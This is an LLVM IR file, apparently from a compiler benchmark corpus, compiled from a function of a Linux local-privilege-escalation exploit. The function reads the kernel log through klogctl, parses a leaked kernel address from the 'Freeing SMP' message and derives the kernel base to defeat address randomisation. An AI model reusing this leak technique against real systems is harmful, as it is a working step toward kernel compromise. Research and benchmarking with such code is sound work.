; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_47168.c_get_kernel_addr_syslog.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_47168.c_get_kernel_addr_syslog.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [22 x i8] c"[.] trying syslog...\0A\00", align 1
@SYSLOG_ACTION_SIZE_BUFFER = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [40 x i8] c"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@PROT_READ = common dso_local global i32 0, align 4
@PROT_WRITE = common dso_local global i32 0, align 4
@MAP_PRIVATE = common dso_local global i32 0, align 4
@MAP_ANONYMOUS = common dso_local global i32 0, align 4
@SYSLOG_ACTION_READ_ALL = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [37 x i8] c"[-] klogctl(SYSLOG_ACTION_READ_ALL)\0A\00", align 1
@.str.3 = private unnamed_addr constant [12 x i8] c"Freeing SMP\00", align 1
@.str.4 = private unnamed_addr constant [39 x i8] c"[-] substring '%s' not found in dmesg\0A\00", align 1
@.str.5 = private unnamed_addr constant [5 x i8] c"ffff\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @get_kernel_addr_syslog() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i8*, align 8
  %3 = alloca i8*, align 8
  %4 = alloca i8*, align 8
  %5 = alloca i8*, align 8
  %6 = alloca i8*, align 8
  %7 = alloca i64, align 8
  %8 = call i32 (i8*, ...) @dprintf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str, i64 0, i64 0))
  %9 = load i32, i32* @SYSLOG_ACTION_SIZE_BUFFER, align 4
  %10 = call i32 @klogctl(i32 %9, i8* null, i32 0)
  store i32 %10, i32* %1, align 4
  %11 = load i32, i32* %1, align 4
  %12 = icmp eq i32 %11, -1
  br i1 %12, label %13, label %17

13:                                               ; preds = %0
  %14 = call i32 (i8*, ...) @dprintf(i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str.1, i64 0, i64 0))
  %15 = load i32, i32* @EXIT_FAILURE, align 4
  %16 = call i32 @exit(i32 %15) #3
  unreachable

17:                                               ; preds = %0
  %18 = load i32, i32* %1, align 4
  %19 = call i32 (...) @getpagesize()
  %20 = sdiv i32 %18, %19
  %21 = add nsw i32 %20, 1
  %22 = call i32 (...) @getpagesize()
  %23 = mul nsw i32 %21, %22
  store i32 %23, i32* %1, align 4
  %24 = load i32, i32* %1, align 4
  %25 = load i32, i32* @PROT_READ, align 4
  %26 = load i32, i32* @PROT_WRITE, align 4
  %27 = or i32 %25, %26
  %28 = load i32, i32* @MAP_PRIVATE, align 4
  %29 = load i32, i32* @MAP_ANONYMOUS, align 4
  %30 = or i32 %28, %29
  %31 = call i64 @mmap(i32* null, i32 %24, i32 %27, i32 %30, i32 -1, i32 0)
  %32 = inttoptr i64 %31 to i8*
  store i8* %32, i8** %2, align 8
  %33 = load i32, i32* @SYSLOG_ACTION_READ_ALL, align 4
  %34 = load i8*, i8** %2, align 8
  %35 = getelementptr inbounds i8, i8* %34, i64 0
  %36 = load i32, i32* %1, align 4
  %37 = call i32 @klogctl(i32 %33, i8* %35, i32 %36)
  store i32 %37, i32* %1, align 4
  %38 = load i32, i32* %1, align 4
  %39 = icmp eq i32 %38, -1
  br i1 %39, label %40, label %44

40:                                               ; preds = %17
  %41 = call i32 (i8*, ...) @dprintf(i8* getelementptr inbounds ([37 x i8], [37 x i8]* @.str.2, i64 0, i64 0))
  %42 = load i32, i32* @EXIT_FAILURE, align 4
  %43 = call i32 @exit(i32 %42) #3
  unreachable

44:                                               ; preds = %17
  store i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.3, i64 0, i64 0), i8** %3, align 8
  %45 = load i8*, i8** %2, align 8
  %46 = getelementptr inbounds i8, i8* %45, i64 0
  %47 = load i32, i32* %1, align 4
  %48 = load i8*, i8** %3, align 8
  %49 = load i8*, i8** %3, align 8
  %50 = call i32 @strlen(i8* %49)
  %51 = call i64 @memmem(i8* %46, i32 %47, i8* %48, i32 %50)
  %52 = inttoptr i64 %51 to i8*
  store i8* %52, i8** %4, align 8
  %53 = load i8*, i8** %4, align 8
  %54 = icmp eq i8* %53, null
  br i1 %54, label %55, label %60

55:                                               ; preds = %44
  %56 = load i8*, i8** %3, align 8
  %57 = call i32 (i8*, ...) @dprintf(i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str.4, i64 0, i64 0), i8* %56)
  %58 = load i32, i32* @EXIT_FAILURE, align 4
  %59 = call i32 @exit(i32 %58) #3
  unreachable

60:                                               ; preds = %44
  store i32 0, i32* %1, align 4
  br label %61

61:                                               ; preds = %70, %60
  %62 = load i8*, i8** %4, align 8
  %63 = load i32, i32* %1, align 4
  %64 = sext i32 %63 to i64
  %65 = getelementptr inbounds i8, i8* %62, i64 %64
  %66 = load i8, i8* %65, align 1
  %67 = sext i8 %66 to i32
  %68 = icmp ne i32 %67, 10
  br i1 %68, label %69, label %73

69:                                               ; preds = %61
  br label %70

70:                                               ; preds = %69
  %71 = load i32, i32* %1, align 4
  %72 = add nsw i32 %71, 1
  store i32 %72, i32* %1, align 4
  br label %61

73:                                               ; preds = %61
  store i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.5, i64 0, i64 0), i8** %5, align 8
  %74 = load i8*, i8** %4, align 8
  %75 = getelementptr inbounds i8, i8* %74, i64 0
  %76 = load i32, i32* %1, align 4
  %77 = load i8*, i8** %5, align 8
  %78 = load i8*, i8** %5, align 8
  %79 = call i32 @strlen(i8* %78)
  %80 = call i64 @memmem(i8* %75, i32 %76, i8* %77, i32 %79)
  %81 = inttoptr i64 %80 to i8*
  store i8* %81, i8** %4, align 8
  %82 = load i8*, i8** %4, align 8
  %83 = icmp eq i8* %82, null
  br i1 %83, label %84, label %89

84:                                               ; preds = %73
  %85 = load i8*, i8** %5, align 8
  %86 = call i32 (i8*, ...) @dprintf(i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str.4, i64 0, i64 0), i8* %85)
  %87 = load i32, i32* @EXIT_FAILURE, align 4
  %88 = call i32 @exit(i32 %87) #3
  unreachable

89:                                               ; preds = %73
  %90 = load i8*, i8** %4, align 8
  %91 = getelementptr inbounds i8, i8* %90, i64 16
  store i8* %91, i8** %6, align 8
  %92 = load i8*, i8** %4, align 8
  %93 = getelementptr inbounds i8, i8* %92, i64 0
  %94 = call i64 @strtoul(i8* %93, i8** %6, i32 16)
  store i64 %94, i64* %7, align 8
  %95 = load i64, i64* %7, align 8
  %96 = and i64 %95, -1048576
  store i64 %96, i64* %7, align 8
  %97 = load i64, i64* %7, align 8
  %98 = sub i64 %97, 16777216
  store i64 %98, i64* %7, align 8
  %99 = load i64, i64* %7, align 8
  ret i64 %99
}

declare dso_local i32 @dprintf(i8*, ...) #1

declare dso_local i32 @klogctl(i32, i8*, i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @getpagesize(...) #1

declare dso_local i64 @mmap(i32*, i32, i32, i32, i32, i32) #1

declare dso_local i64 @memmem(i8*, i32, i8*, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i64 @strtoul(i8*, i8**, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
